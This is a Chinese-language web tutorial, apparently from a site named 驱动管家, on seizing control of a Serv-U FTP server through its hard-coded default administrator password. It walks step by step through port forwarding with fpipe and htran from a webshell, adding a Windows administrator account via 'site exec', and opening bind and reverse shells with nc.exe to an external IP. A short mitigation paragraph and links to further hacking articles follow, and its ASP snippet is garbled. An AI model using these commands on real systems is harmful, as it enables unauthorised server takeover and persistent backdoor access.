Serv-u管理端口权限怎么得到？具体实施方法是什么？

2018-03-13 11:30:40责编：llp 来源：驱动管家人气：

Serv-U默认监听127.0.0.1:43958，在本机才能连接这个管理端口，Serv-U默认管理账号是localAdministrator，默认密码是"#l@$ak#.lk;0@P"，这个密码是固定的。在目标机器上运行fpipe -v -l 12345 -r 43958 127.0.0.1，然后在你自己的机器，用"Serv-U administrator"新建SERVER。

目标IP:12345

User:LocalAdministrator

Pass:"#l@$ak#.lk;0@P"0

那么目标机器的Serv-U就归你管了。

利用的前提：要有目标机器的普通权限的SHELL，不需要能终端或物理控制台登录，只要有个shell，能运行端口数据转发的程序就可以了

如何得到一个shell:sql注射得到webshell或者直接利用动网7.0 sp2以下的上传漏洞上传webshell

Serv-u管理端口权限怎么得到？具体实施方法是什么？

具体实施方法

1.利用得到的webshell上传转向程序fpipe，然后执行fpipe -v -l 12345 -r 43958 127.0.0.1

2 .在你自己的机器，用"Serv-U administrator"新建SERVER，依次填入

ip:目标IP

端口 :12345

User:LocalAdministrator

Pass:"#l@$ak#.lk;0@P"

现在你就可以管理这台服务器的Serv-U了，新建一个账号，权限为系统管理员(system dministrator)，并在"目录访问(Dir access)"选项中给予"执行"权限(execute).

3. ftp连接，然后执行quote site exec net user iisuser password /add添加一个用户名为iisuser密码为password的用户，加到管理员组 quote site exec net localgroup administrators iisuser /add，现在就可以连接终端并登录了。当然也可以进行别的操作，例如上传一个nc.exe，在目标机器上得到一个管理员权限的shell，可以正向连接，也可以反向连接。

正向连接：连上ftp以后执行quote site exec nc.exe -l -p 23 -t -e cmd.exe这时目标主机就成了一台telnet服务器，你可以telnet上目标服务器的23端口.

反向连接：假设你的IP是202.96.209.168

1.先在自己的机器上运行(你要有一个外部IP)：nc -vv -lp 99

2.在目标机器上运行 nc -e cmd.exe 202.96.209.168 99

在你的机器上就会得到一个目标机器的具有管理员权限的shell

如果对方进行了端口过滤或者设置了防火墙的保护( 这种保护不限制反弹连接，如果限制的话就要换别的方法）可以用TCP SOCKET转发来实现。

打个比方：

我的机器为 A；

我要测试的机器为 B[不允许正面连接]；

我已经在B上得到呢一个SHELL[只要guest的就行呢]？

我们可以这样连上对方的43958：

I：我在本地监听二个端口23和56

23是等待B来连接的；

56是等待我来连接的；

II：B连接我监听的23，同时转发到本地的43958

这样管道就建好呢~对方的防火墙就拿我们没有办法呢？

此时在本地运行Serv-U新建一个SERVER，IP填上本地的127.0.0.1端口为56用户localAdministrator，密码#l@$ak#.lk;0@P。

具体实施方法

假设你的IP是 202.96.209.168

1.在你自己的机器上运行 htran.exe -listen 23 56；

2.此时在本地运行Serv-U新建一个SERVER，IP填上本地的127.0.0.1端口为56，用户名LocalAdministrator，密码#l@$ak#.lk;0@P；

3。在目标机器上运行 htran.exe -slave 127.0.0.1 43958 202.96.209.168 23

如果不能在webshell下直接运行，可以写一个asp脚本来执行，内容如下：connect.asp<%set 23="" 43958="" oscript="Server.CreateObject("WSCRIPT.SHELL")oScript.Run" -slave="" 127.0.0.1="" 202.96.209.168="">执行http://目标网址/connect.asp，如果出来一片空白，没提示什么错误，现在你应该可以管理目标服务器的Serv-U了，余下的事情就看您自由发挥了。htran.exe是一个多线程包转发工具，可以到红盟下载

防止方法

自己给Serv-U打补丁，改变默认端口及管理密码。修改 ServUAdmin.exe、ServUDaemon.exe这两个文件，改端口只要在ServUDaemon.ini文件[GLOBAL]选项中加入LocalSetupPortNo=12345即可

很遗憾，在Serv-U的最新版本Serv-U 5.2.0.0中依然没有任何改变，默认的管理端口及密码还是原来的。

如何导出日志文件到web目录来获得shell？
dbowner通过注射得到一个shell应该不是什么难事情了，比较麻烦的是就算利用增量备份，仍然有很多不确定的因素，如果之前别人有过什么错误的写入信息，可能备份出来得到的还是一些不能用的500错误，如何能够提高成
详情2018-02-10 19:31:19责编：llp 来源：驱动管家
如何利用编辑器代码逃逸漏洞拿到网站权限？
把他变成小马，成功保存，但是没有被执行，应该是马的问题马儿不行当然是更换了这不怪事出现了你看看命令成功完成! 非法操作! 这这么跑出来了?????????????真是怪了难道我的马儿真的长褪了?研究
详情2018-02-02 19:04:48责编：llp 来源：驱动管家
迅雷浏览器如何提权？可以利用安装迅雷的htm文件
当我们使用迅雷下载东西的时候，会调用我们安装迅雷后一个htm文件，去激活htm文件里的一些代码，把我们所下载东西添加到列表当中。所对应的htm文件有2处一处是C: Program Files Thunder Network Thunder Progra
详情2018-02-16 18:04:33责编：llp 来源：驱动管家
破解管理员密码的一种方法：用U盘破解
有许多朋友还在为忘记XP登陆密码不能进入系统而烦恼，笔者现在将给用户介绍一个小方法，解决忘记密码给你带来的烦恼……有许多朋友还在为忘记XP登陆密码不能进入系统而烦恼，笔者现在将给用户介绍一个小方法，解
详情2018-01-21 10:04:29责编：llp 来源：驱动管家
怎么用beff+msf工具在kall内网利用xss拿内网主机？
metasploit内网渗透方面好多方式，这只是科普下xss在内网中的利用。系统:KALI用到的工具：beEF+msf利用的IE漏洞是：http: www rapid7 com db modules exploit windows browser ie_execcommand_uafMS12-063Automa
详情2018-02-26 20:23:04责编：llp 来源：驱动管家
u盘文件加密怎么做？U盘文件加密需要注意什么？
现在U盘的存储空间越来越大，读写速度越来越快，可以轻松存储大量的文件到U盘里面；同时，优盘具有便携性等特点，使得U盘的使用极为普遍。但是，优盘在方便了工作生活的同时，也面临着一些风险。尤其是当U盘文件
详情2018-01-10 08:43:37责编：llp 来源：驱动管家
怎么隐藏一句话木马？利用ntfs流隐藏你的一句话木马
这是利用NTFS流隐藏你的一句话小马，这方法，文件写入后，不容易给发现，隐藏性好！如下是ASP脚本的例子！NTFS流文件的内容如下
详情2018-01-19 12:30:40责编：llp 来源：驱动管家
z blog后台权限怎么拿？这里有三种常用简单拿shell的方法
Z-blog后台拿SHELL方法很多关键看你有没有本事进后台，逍遥复仇整理三种常用简单后台拿SHELL的方法供大家参考一、在上传类型添加asp或者asa然后上传大马就好了二、进后台在附件那上传* asp;1 jpg，不要选择“自动
详情2018-03-05 18:30:19责编：llp 来源：驱动管家
海康威视远程监控存在的xxe漏洞分析研究报告
海康威视是一个致力于不断提升视频处理技术和视频分析技术，面向全球提供领先的监控产品、技术解决方案与专业优质服务，物联网发展和安全威胁总是如影随形。两个月前，我想研究一下网络摄像机，然后就在亚马逊上
详情2018-01-15 15:26:02责编：llp 来源：驱动管家
通信协议有哪些？各通信协议的主要用途和特点
做过网络人都知道，要实现网络间的正常通信就必需选择合适的通信协议，否则轻则就会造成网络的接入速度太慢，工作不稳定，重则根本无法接通。今天我把我实际工作积累的此方面经验与大家分享，希望对还在迷茫中的
详情2018-01-20 14:28:53责编：llp 来源：驱动管家